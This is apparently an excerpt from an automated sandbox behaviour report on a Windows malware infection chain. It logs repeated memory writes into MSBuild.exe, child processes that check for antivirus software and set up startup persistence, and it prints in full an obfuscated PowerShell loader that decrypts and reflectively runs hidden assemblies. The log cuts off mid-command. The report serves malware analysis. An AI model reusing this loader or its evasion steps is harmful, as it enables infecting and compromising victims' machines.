Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49BDC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49C40
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49CA4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49D08
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49D6C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49DD0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49E34
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49E98
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49EFC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49F60
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D49FC4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A028
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A08C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A0F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A154
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A1B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A21C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A280
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A2E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A348
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A3AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A410
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A474
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A4D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A53C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A5A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A604
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A668
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A6CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A730
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A794
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A7F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A85C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A8C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A924
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A988
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4A9EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AA50
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AAB4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AB18
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AB7C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4ABE0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AC44
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4ACA8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AD0C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AD70
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4ADD4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AE38
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AE9C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AF00
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AF64
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4AFC8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B02C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B090
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B0F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B158
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B1BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B220
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B284
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B2E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B34C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B3B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B414
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B478
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B4DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B540
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B5A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B608
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B66C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B6D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B734
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B798
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B7FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B860
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B8C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B928
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B98C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4B9F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BA54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BAB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BB1C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BB80
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BBE4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BC48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BCAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BD10
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BD74
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BDD8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BE3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BEA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BF04
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BF68
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4BFCC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C030
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C094
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C0F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C15C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C1C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C224
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C288
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4C2EC

Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe "C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe "C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe "C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe "C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Process created: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe"
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 